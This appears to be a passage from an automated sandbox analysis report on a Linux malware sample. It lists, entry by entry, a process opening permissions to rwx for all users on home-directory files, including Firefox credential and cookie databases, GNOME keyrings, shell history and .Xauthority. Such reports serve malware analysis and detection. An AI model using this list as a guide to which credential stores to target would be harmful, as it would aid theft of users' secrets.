      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/63F48F4F7F1BC3195F5AB831F9794F3DBA2D30E1 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/6B459D246F7887BA8513F5801DE752A08094DD8A (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/05582FF5C196A4485F189490FEC9ECEA0890DA32 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E771454BB360CA5F7AA169E5416B493549BC2F59 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/B7DB036074231ACC212F58CA5B8AF0545A418060 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/44852F548E2DA4AF2A968DAF307485F74EF6F3C0 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/2BC6D22E320C3AD5F122613FBBF24D8F8DDFE8D2 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/44F81E7E214B17FF25AC54556BC33AC0C1A62B26 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/A698B6CF98F43F9B0EE1C1DAF3F2CB9BFF09A47C (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/F8AC72083E334F70A553AE68455FBDF0E65C5221 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/F17F04878A68505AE5481A71D8B733C5FFC6F285 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/5A9F94FBA58DB2BB86940F164F51C5190533CAC7 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E6D66AFFD836C8C13B306AAB42C9C6E3425363B6 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/AAD09DC668B8529769AEBA7A4A9EC20D79EC925A (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E7EAFD1748127CEAA48DCDD05E7998E3CAA95B8C (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/2B610FAD6EE6174C3C15BA488F7D896FD22FF794 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/65856B83CBC9E01A5FFF9981914F04B0F6436116 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/DC07751AD90150C6B658CD05E99F18A6A725B500 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/3DF10699984A3086A21900FAEC5595CBE3948F33 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/1AA5DF3AA9BAF5D88A5D31A2D2753A33FA1BE5DB (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/567881F4A84A4E54FD9DE83AA17D8ADA4C81402C (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/13B6B1BA274AC60E2BBF033AA422B2D3D3B07FD1 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/18CE467B00ED7B507CC72681EDCED9F73527CDD9 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/9548F9611999ED8CA357720E12017816424CFB6F (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/076B04687E353A48BF9F8F54C7556DD5EE9381D0 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E4ED869149E42472064566CF555F4CBDFA43F6CE (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/2F8D3E7DF38A8EFF19A37E06DB9A7C5A88B70C11 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/1679441B8AA7B4D31717C773CC4E86A25B37532B (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/DE556ABC4C4DACD7976DC8E9EB9F5C9DC0E7B076 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/3BE2F225068DFB4AA8BD93F696A41C16C8CFA27F (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/480A7F2B2D435C5021E4D92358EBDE99275450C8 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/2EEBE7D9E8B2C0EC2F1A732F578AEFE4851A2A53 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/499B8F86D3D7ACD12153BFF4E7D9C21E20E57862 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/D6D7AC0B3D4DAC40D7A42CBE0FCCD3EF6B2BB312 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/5DDA527DCC532D0D7032913A302155F3451E45B3 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/7051A1E5425B79519AE6F65AD3BB2390F7D1C39B (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/mozilla/firefox/u5o5kk16.default/cache2/ce_T151c2VyQ29udGV4dElkPTEsYSw= (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.cache/logrotate/status (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.xsession-errors (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.dmrc (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.bashrc (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.dbus/session-bus/f0b45546524a75b2e6e8e8a55aab94da-0 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.thumbnails/normal/203a169dec3216fbb03bc6760e7d0f9a.png (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.thumbnails/normal/d7de604c8b54b08bf50a3c2c28efd2df.png (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.thumbnails/normal/2454247923350b5d65d258305ccf59ce.png (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.thumbnails/normal/6635e1111ee0cd4813b439af8913fa49.png (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.thumbnails/normal/12095cb0c16f1a0895ab343c7eb4b7c6.png (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.bash_history (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.profile (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.Xauthority (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/profiles.ini (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/Crash Reports/InstallTime20180313132747 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/pkcs11.txt (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/favicons.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/SecurityPreloadState.txt (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/AlternateServices.txt (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/cert9.db (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/search.json.mozlz4 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/saved-telemetry-pings/583ee681-7cfa-4d12-8648-eb797a8eec37 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/saved-telemetry-pings/9c07e1b5-a82a-432e-9a4c-18a3a975ad85 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/saved-telemetry-pings/e0d24830-8ed6-4f1a-b4e9-bfe84de4fc39 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/compatibility.ini (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/addonStartup.json.lz4 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/content-prefs.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/sessionstore.jsonlz4 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/key3.db (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/addons.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/containers.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/datareporting/state.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/datareporting/session-state.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/datareporting/archived/2018-04/1524571606164.583ee681-7cfa-4d12-8648-eb797a8eec37.first-shutdown.jsonlz4 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/datareporting/archived/2018-04/1524571606142.e0d24830-8ed6-4f1a-b4e9-bfe84de4fc39.new-profile.jsonlz4 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/datareporting/archived/2018-04/1524571606162.9c07e1b5-a82a-432e-9a4c-18a3a975ad85.main.jsonlz4 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/SiteSecurityServiceState.txt (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/xulstore.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/times.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/key4.db (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/blocklist.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/cookies.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/cert8.db (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/prefs.js (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/webappsstore.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/sessionCheckpoints.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/permissions.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/places.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/storage.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/shield-preference-experiments.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/.parentlock (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/extensions.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/.metadata-v2 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/idb/3561288849sdhlie.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/idb/2918063365piupsah.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/storage/permanent/chrome/.metadata (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/.metadata-v2 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/idb/3312185054sbndi_pspte.sqlite (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/idb/3312185054sbndi_pspte.files/1 (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/.metadata (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/handlers.json (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.mozilla/firefox/u5o5kk16.default/secmod.db (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.xsession-errors.old (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/recently-used.xbel (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/evolution/calendar/system/calendar.ics (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/evolution/addressbook/system/contacts.db (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/evolution/tasks/system/tasks.ics (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/applications/mimeapps.list (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/gvfs-metadata/root-d269eba3.log (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/gvfs-metadata/home-02b035a1.log (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/gvfs-metadata/home (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/gvfs-metadata/root (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/keyrings/user.keystore (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/keyrings/login.keyring (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.local/share/session_migration-xubuntu (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.sudo_as_admin_successful (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/Thunar/uca.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/mimeapps.list (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/evolution/sources/system-proxy.source (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/pulse/cookie (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-card-database.tdb (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-stream-volumes.tdb (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-device-volumes.tdb (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-default-source (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-default-sink (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/user-dirs.locale (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/dconf/user (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/gedit/accels (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libaccounts-glib/accounts.db (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/user-dirs.dirs (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/panel/whiskermenu-1.rc (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/desktop/icons.screen0-1008x727.rc (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/desktop/icons.screen0-1008x752.rc (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/desktop/icons.screen0-784x559.rc (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/xfconf/xfce-perchannel-xml/xfwm4.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/xfconf/xfce-perchannel-xml/thunar.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-session.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-panel.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/xfconf/xfce-perchannel-xml/keyboards.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/xfconf/xfce-perchannel-xml/displays.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-desktop.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/backenddb.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/backenddb.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/uno_packages/cache/log.txt (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/gallery/sg30.thm (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/gallery/sg30.sdv (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/registrymodifications.xcu (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/database/biblio/biblio.dbf (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/database/biblio/biblio.dbt (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/database/evolocal.odb (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/database/biblio.odb (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/basic/dialog.xlc (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/basic/Standard/Module1.xba (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/basic/Standard/dialog.xlb (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/basic/Standard/script.xlb (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/basic/script.xlc (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/autotext/mytexts.bau (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/config/autotbl.fmt (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/config/javasettings_Linux_X86_64.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/psprint/pspfontcache (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/extensions/shared/lastsynchronized (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/backenddb.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/extensions/shared/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/backenddb.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/extensions/buildid (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/backenddb.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/extensions/tmp/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/backenddb.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/extensions/bundled/lastsynchronized (bits: - usr: - grp: - all: rwx)Jump to behavior
